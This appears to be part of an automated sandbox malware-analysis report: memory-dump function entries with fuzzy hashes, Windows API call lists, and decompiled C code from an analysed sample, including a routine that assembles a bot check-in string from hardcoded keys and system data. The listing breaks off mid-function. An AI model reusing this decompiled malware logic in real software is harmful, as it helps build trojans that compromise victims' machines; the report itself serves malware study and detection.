                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorStatus
                              • String ID:
                              • API String ID: 1596131371-0
                              • Opcode ID: bf82628fda341318fef09230412e2af5f8aa0f94bf991891ad6803261708a4cc
                              • Instruction ID: 2af8077770fd3cfaab94dc4a879507f62bff21ac17891840853934982f3e6bce
                              • Opcode Fuzzy Hash: bf82628fda341318fef09230412e2af5f8aa0f94bf991891ad6803261708a4cc
                              • Instruction Fuzzy Hash: 11C01275604202ABEA285E54DA59A3A7A65EB94380F00441CF1C986074D67AA860D710
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01035B0C, Relevance: .7, Instructions: 669COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c23dfc1828a85ae67758a7cd450c7eaeaf603e74c1ec83de0ea9548bb258d9a6
                              • Instruction ID: 2a551d33bbea771254988d4bf27dd154cf0cbd2e9bf2cda550acc600812f534a
                              • Opcode Fuzzy Hash: c23dfc1828a85ae67758a7cd450c7eaeaf603e74c1ec83de0ea9548bb258d9a6
                              • Instruction Fuzzy Hash: F7425B71E00218DFDF18CF58C8906ACBBF6FF85315F18819AD891AB286D7359A41DF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01021D4F, Relevance: .4, Instructions: 386COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
                              • Instruction ID: f7e684fb203505b1e8928fc943e5038d33efe7acfd6f768c907b999111889a60
                              • Opcode Fuzzy Hash: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
                              • Instruction Fuzzy Hash: 5CF165309082599BCF0DCF99D4A09BDBBB2FF89314B14C19EE49667746CB386A45CF14
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01031690, Relevance: .3, Instructions: 298COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memcpy
                              • String ID:
                              • API String ID: 3510742995-0
                              • Opcode ID: 4564216324c84e9ea7d3875b80a2d1754742764108dcf23a21da02889a93929d
                              • Instruction ID: 56177fa50b9881d0615e3b3f98264a82d36d666116360169f354d2237545ebcf
                              • Opcode Fuzzy Hash: 4564216324c84e9ea7d3875b80a2d1754742764108dcf23a21da02889a93929d
                              • Instruction Fuzzy Hash: D4C1FE35600B418FD366CF29C890AA6B7EAFF89304B58496ED9D787B61D735F846CB00
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013A08B7, Relevance: .2, Instructions: 250COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.654953181.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7a05a1341af127c7055204d9f0f8425db11732d7f2db784e5380964f2177d599
                              • Instruction ID: bba89542942f640b5586e9f7fc395d1bf35f1d768548ac947dd6784017514c81
                              • Opcode Fuzzy Hash: 7a05a1341af127c7055204d9f0f8425db11732d7f2db784e5380964f2177d599
                              • Instruction Fuzzy Hash: 59A1353590011AEFEF28CF54CD88AAEB7B5FB88318F5482D4E909A7111D331AE95DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013A0B14, Relevance: .1, Instructions: 113COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.654953181.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: db3623d69b392f9475b706dc980f7d37dab416ecabbf3a8725ab1da11c408c55
                              • Instruction ID: fa66330cf8c5aee178acdb4eacd457b3836a1590a658782b7b126cd47cef2e2f
                              • Opcode Fuzzy Hash: db3623d69b392f9475b706dc980f7d37dab416ecabbf3a8725ab1da11c408c55
                              • Instruction Fuzzy Hash: 11416A36A0011ADFDF18DF44DA84AA9BB75FF44328F5991D1E9082B616D330EE81CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013A0BFC, Relevance: .1, Instructions: 103COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.654953181.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eff56b0e502ab34dbd6d19980d1cec6f61576d379da3f664d79121f57fb91cd2
                              • Instruction ID: 9887e761d7ab57eb4bd0ff732a560e7c73a46382ce3aa0361503955f8d779708
                              • Opcode Fuzzy Hash: eff56b0e502ab34dbd6d19980d1cec6f61576d379da3f664d79121f57fb91cd2
                              • Instruction Fuzzy Hash: 5D41597290021ADFDF29DF08C984BA9B7B5FF48328F594594E9096B612D330EE85CF80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013A0DF7, Relevance: .1, Instructions: 89COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.654953181.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cf287ffc4e341bc06d80edb3291e6e9b1bf40293c8552711f4844ee0b98f851c
                              • Instruction ID: ad1a21f8d160ce87599c62688bf862bc0adf2d0e07fb73c053a7bab4f3bc8fd0
                              • Opcode Fuzzy Hash: cf287ffc4e341bc06d80edb3291e6e9b1bf40293c8552711f4844ee0b98f851c
                              • Instruction Fuzzy Hash: 732160C28123142BEF40147C986F3D62780DB93791FE57989CB908B993D86C326FB25C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013A0DF9, Relevance: .1, Instructions: 88COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.654953181.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2f55b393d3810ae8c90af1626232ee65d3f05f29943e77d134f615a2089ec3b6
                              • Instruction ID: a6a89a0e3eb020c230afacaef5485ff8afb6d3640af64d748904b31264c5fc9c
                              • Opcode Fuzzy Hash: 2f55b393d3810ae8c90af1626232ee65d3f05f29943e77d134f615a2089ec3b6
                              • Instruction Fuzzy Hash: 012140D28123142BEF40147C986F7D62780DB93791FE57989CB908B993D86C726FB25C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013A0CE8, Relevance: .1, Instructions: 86COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.654953181.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9bbc67fe973a058611bdfcec5154a0c5b48887a2d44471a1722b7858c40af1c4
                              • Instruction ID: dbf4d849384ce40945bb890c110743f9f8bc82553423eccdd778858d85903214
                              • Opcode Fuzzy Hash: 9bbc67fe973a058611bdfcec5154a0c5b48887a2d44471a1722b7858c40af1c4
                              • Instruction Fuzzy Hash: 2D311C76A00115DFEB28DF58C984BA9BBB5FF88728F198594E9496B215D330FD40CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010492C4, Relevance: .1, Instructions: 77COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                              • Instruction ID: 15711c697747ffb8f55c4a2d367dadbebc72fd14421adf83775fe8326f3fadf7
                              • Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                              • Instruction Fuzzy Hash: 0621A9B29002059BDB14EF68C8C09A7BBA5BF49354B45C1B8D9558B145DB30F515C7E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013EB084, Relevance: .1, Instructions: 77COMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 71%
                              			E013EB084(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E013EB1EF(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E013EB2A9(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E013EB194(_t55, _t66);
										_t89 = _t66 + 0x10;
										E013EB1EF(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E013EB28B(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                              0x013eb088
                              0x013eb089
                              0x013eb08a
                              0x013eb08d
                              0x013eb08f
                              0x013eb092
                              0x013eb093
                              0x013eb095
                              0x013eb096
                              0x013eb097
                              0x013eb09a
                              0x013eb0a4
                              0x013eb155
                              0x013eb15c
                              0x013eb165
                              0x013eb0aa
                              0x013eb0aa
                              0x013eb0b0
                              0x013eb0b6
                              0x013eb0b9
                              0x013eb0bc
                              0x013eb0c0
                              0x013eb0c5
                              0x013eb0ca
                              0x013eb14a
                              0x00000000
                              0x013eb0cc
                              0x013eb0cc
                              0x013eb0d8
                              0x013eb0da
                              0x013eb135
                              0x013eb135
                              0x013eb13b
                              0x00000000
                              0x013eb0dc
                              0x013eb0eb
                              0x013eb0ed
                              0x013eb0ee
                              0x013eb0ef
                              0x013eb0f2
                              0x013eb0f2
                              0x013eb0f4
                              0x00000000
                              0x013eb0f6
                              0x013eb0f6
                              0x013eb140
                              0x013eb0f8
                              0x013eb0f8
                              0x013eb0fc
                              0x013eb104
                              0x013eb109
                              0x013eb10e
                              0x013eb11a
                              0x013eb122
                              0x013eb129
                              0x013eb12f
                              0x013eb133
                              0x00000000
                              0x013eb133
                              0x013eb0f6
                              0x013eb0f4
                              0x00000000
                              0x013eb0da
                              0x013eb14e
                              0x013eb14e
                              0x013eb14e
                              0x013eb0ca
                              0x013eb16a
                              0x013eb171

                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                              • Instruction ID: 8491a5b78e25be0ada3dced7ec7a745abe810361f1d16ad4daaf2b46f06cc621
                              • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                              • Instruction Fuzzy Hash: 5A21A4729003159BDB15DF68CC889ABFBE5BF44324B068169D9598B289E730F915CBE0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013A0C57, Relevance: .1, Instructions: 71COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.654953181.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5e96fecf1beddd3b76d07fde5832fd7c53e0b2e32fb11b62dc8dbbe0f405f65e
                              • Instruction ID: 8986ec881f042af60e947d11dbb5d2afe8ed312313fb550b9dd58cb796f4fabd
                              • Opcode Fuzzy Hash: 5e96fecf1beddd3b76d07fde5832fd7c53e0b2e32fb11b62dc8dbbe0f405f65e
                              • Instruction Fuzzy Hash: 60212A36900219CFDF29DF08C984B99B7B5FF48328F999594E9092B216D330FA85CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013A0CA5, Relevance: .1, Instructions: 66COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.654953181.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6c27be35f30ed7fae72f6688cbe8062afc13bdcf577ad36acb3384648b0bb96a
                              • Instruction ID: d63f5bc0074dc6ab4b8f73dab39f6eb810042c2441f49f2a6e7c2faca5eb49ca
                              • Opcode Fuzzy Hash: 6c27be35f30ed7fae72f6688cbe8062afc13bdcf577ad36acb3384648b0bb96a
                              • Instruction Fuzzy Hash: 78210B72A0161ACFDF29DF18C984B697BB5FF48328F5985D4E9096B219D330E981CF81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013A0ABA, Relevance: .0, Instructions: 23COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.654953181.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b823bf0e16b18a6fc0919ce940541d11550962391f27c1153c9d111869025669
                              • Instruction ID: 91876851fdd40f221c7bb1862809809192b375a130a96839714b51c77ae56b72
                              • Opcode Fuzzy Hash: b823bf0e16b18a6fc0919ce940541d11550962391f27c1153c9d111869025669
                              • Instruction Fuzzy Hash: F3E0ED34D0016D8BCF24DA14CE4A79AB3B6EB8821DF5540D4D40E772119631EE95CE81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013A0880, Relevance: .0, Instructions: 20COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.654953181.00000000013A0000.00000040.00000001.sdmp, Offset: 013A0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5cfc1f8ba3b40cab8973f2772ebbef48046fef00e303bb1a936c64e67a5b6734
                              • Instruction ID: 42c20485db21fa82986cc209abfa2e9dee5029abbd06a7ee9f78e30ea6be3001
                              • Opcode Fuzzy Hash: 5cfc1f8ba3b40cab8973f2772ebbef48046fef00e303bb1a936c64e67a5b6734
                              • Instruction Fuzzy Hash: BCE0B6B6901118FEFF168A45CD44FFAB7BDEBC8700F1480E2E609AA050C6315E808F20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010476C9, Relevance: 56.0, APIs: 37, Instructions: 454synchronizationtimethreadCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 01028BF0: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01028C24
                                • Part of subcall function 01028BF0: GetLastError.KERNEL32(?), ref: 01028CE5
                                • Part of subcall function 01028BF0: ReleaseMutex.KERNEL32(00000000), ref: 01028CEE
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01047767
                                • Part of subcall function 0103D4BA: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0103D4D4
                                • Part of subcall function 0103D4BA: CreateWaitableTimerA.KERNEL32(01050244,00000003,?), ref: 0103D4F1
                                • Part of subcall function 0103D4BA: GetLastError.KERNEL32(?,?,01028C58,?), ref: 0103D502
                                • Part of subcall function 0103D4BA: GetSystemTimeAsFileTime.KERNEL32(?,00000000,01028C58,?,?,?,01028C58,?), ref: 0103D542
                                • Part of subcall function 0103D4BA: SetWaitableTimer.KERNEL32(?,01028C58,00000000,00000000,00000000,00000000,?,?,01028C58,?), ref: 0103D561
                                • Part of subcall function 0103D4BA: HeapFree.KERNEL32(00000000,01028C58,00000000,01028C58,?,?,?,01028C58,?), ref: 0103D577
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 010477A6
                              • StrChrA.SHLWAPI(00000000,0000007C,00000040,00000000,00000000,00000000,00000000,00000000), ref: 01047821
                              • StrTrimA.SHLWAPI(00000000,?), ref: 01047843
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 01047883
                              • WaitForMultipleObjects.KERNEL32(00008019,?,00000000,000000FF), ref: 0104791D
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 01047952
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 01047971
                              • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 010479A2
                              • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 010479BC
                              • _allmul.NTDLL(0000003C,00000000,FF676980,000000FF), ref: 01047A07
                              • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,0000003C,00000000,FF676980,000000FF), ref: 01047A21
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01047A37
                              • ReleaseMutex.KERNEL32(?), ref: 01047A54
                              • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000), ref: 01047A75
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 01047A91
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 01047AA0
                                • Part of subcall function 0102FD22: lstrlen.KERNEL32(?,?,00000000,00000000,0103D9EF,00000011,?,00000001,00000000,?,-00000008), ref: 0102FD52
                                • Part of subcall function 0102FD22: RtlAllocateHeap.NTDLL(00000000,-00000008,?), ref: 0102FD68
                                • Part of subcall function 0102FD22: memcpy.NTDLL(00000010,?,00000000), ref: 0102FD9E
                                • Part of subcall function 0102FD22: memcpy.NTDLL(00000010,00000000,?), ref: 0102FDB9
                                • Part of subcall function 0102FD22: CallNamedPipeA.KERNEL32(00000000,-00000008,?,00000010,00000028,00000001), ref: 0102FDD7
                                • Part of subcall function 0102FD22: GetLastError.KERNEL32 ref: 0102FDE1
                                • Part of subcall function 0102FD22: HeapFree.KERNEL32(00000000,00000000), ref: 0102FE04
                              • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 01047AD4
                              • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 01047AEE
                              • SwitchToThread.KERNEL32 ref: 01047AF0
                              • ReleaseMutex.KERNEL32(?), ref: 01047AFA
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 01047B38
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 01047B43
                              • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 01047B66
                              • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 01047B80
                              • SwitchToThread.KERNEL32 ref: 01047B82
                              • ReleaseMutex.KERNEL32(?), ref: 01047B8C
                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 01047BA1
                              • CloseHandle.KERNEL32(?), ref: 01047BEF
                              • CloseHandle.KERNEL32(?), ref: 01047C03
                              • CloseHandle.KERNEL32(?), ref: 01047C0F
                              • CloseHandle.KERNEL32(?), ref: 01047C1B
                              • CloseHandle.KERNEL32(?), ref: 01047C27
                              • CloseHandle.KERNEL32(?), ref: 01047C33
                              • CloseHandle.KERNEL32(?), ref: 01047C3F
                              • CloseHandle.KERNEL32(?), ref: 01047C4B
                              • RtlExitUserThread.NTDLL(00000000), ref: 01047C5A
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Wait$CloseHandleTimerWaitable$ObjectSingle$MultipleObjects$MutexRelease_allmul$ErrorHeapLastThread$CreateFreeSwitchTimememcpy$AllocateCallEventExitFileNamedOpenPipeSystemTrimUserlstrlen
                              • String ID:
                              • API String ID: 2535136096-0
                              • Opcode ID: 64c689c796dfd91b6f5ea51a85d29bc19cd419c94e91a26448f0eb9f20fc5841
                              • Instruction ID: 34f35e680b25f67921832172078f3b289792815c7dbdf1fe92b325000cb5d6c0
                              • Opcode Fuzzy Hash: 64c689c796dfd91b6f5ea51a85d29bc19cd419c94e91a26448f0eb9f20fc5841
                              • Instruction Fuzzy Hash: FEF18DB1408346AFE721AF68CDC4A6FBBE9FB84354F000A7DF6D1921A4D7769C408B52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E7132, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 244memorystringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 74%
                              			E013E7132(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x13ed018; // 0x9945a377
				asm("bswap eax");
				_t61 =  *0x13ed014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x13ed010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x13ed00c; // 0x13d015ef
				asm("bswap eax");
				_t64 =  *0x13ed2b8; // 0x26ea5a8
				_t3 = _t64 + 0x13ee633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3f87e, _t63, _t62, _t61, _t60,  *0x13ed02c,  *0x13ed004, _t59);
				_t67 = E013E8DA6();
				_t68 =  *0x13ed2b8; // 0x26ea5a8
				_t4 = _t68 + 0x13ee673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E013E40AC(_t134);
				_t133 = __imp__; // 0x74785520
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x13ed2b8; // 0x26ea5a8
					_t7 = _t126 + 0x13ee8b2; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x13ed270, 0, _v8);
				}
				_t73 = E013E8941();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x13ed2b8; // 0x26ea5a8
					_t11 = _t121 + 0x13ee885; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x13ed270, 0, _v8);
				}
				_t146 =  *0x13ed35c; // 0x3ad95b0
				_t75 = E013E3FB8(0x13ed00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x13ed270, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x13ed270, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x13ed270, _t152, _v20);
						goto L26;
					}
					E013E47EF(GetTickCount());
					_t82 =  *0x13ed35c; // 0x3ad95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x13ed35c; // 0x3ad95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x13ed35c; // 0x3ad95b0
					_t148 = E013EA7FB(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x13ed270, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x13ec2ac);
					_push(_t148);
					_t94 = E013E6F6D();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x13ed270, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E013E65F6( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E013E55F1();
						L22:
						HeapFree( *0x13ed270, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E013E7681(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E013E42E6(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E013E6DFA(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E013E2F36(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E013E6DFA(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}





















































                              0x013e7132
                              0x013e7132
                              0x013e7132
                              0x013e713d
                              0x013e7144
                              0x013e7146
                              0x013e7146
                              0x013e7153
                              0x013e715e
                              0x013e7161
                              0x013e7166
                              0x013e716f
                              0x013e7172
                              0x013e7177
                              0x013e717a
                              0x013e717f
                              0x013e7182
                              0x013e718e
                              0x013e719b
                              0x013e719d
                              0x013e71a3
                              0x013e71a8
                              0x013e71b3
                              0x013e71b5
                              0x013e71b8
                              0x013e71ba
                              0x013e71c1
                              0x013e71c7
                              0x013e71ca
                              0x013e71cd
                              0x013e71d2
                              0x013e71df
                              0x013e71e1
                              0x013e71e7
                              0x013e71f1
                              0x013e71f1
                              0x013e71f3
                              0x013e71fa
                              0x013e71fd
                              0x013e7200
                              0x013e7205
                              0x013e7212
                              0x013e7214
                              0x013e7222
                              0x013e7222
                              0x013e7224
                              0x013e7232
                              0x013e7237
                              0x013e723b
                              0x013e723e
                              0x013e73ff
                              0x013e7409
                              0x013e7412
                              0x013e7244
                              0x013e7250
                              0x013e7258
                              0x013e725b
                              0x013e73f3
                              0x013e73fd
                              0x00000000
                              0x013e73fd
                              0x013e7267
                              0x013e726c
                              0x013e7275
                              0x013e7286
                              0x013e728a
                              0x013e7293
                              0x013e7299
                              0x013e72a8
                              0x013e72af
                              0x013e72b8
                              0x013e72be
                              0x013e73e7
                              0x013e73f1
                              0x00000000
                              0x013e73f1
                              0x013e72ca
                              0x013e72d0
                              0x013e72d1
                              0x013e72d8
                              0x013e72db
                              0x013e73dd
                              0x013e73e5
                              0x00000000
                              0x013e73e5
                              0x013e72e4
                              0x013e72eb
                              0x013e72f3
                              0x013e72f8
                              0x013e7301
                              0x013e730c
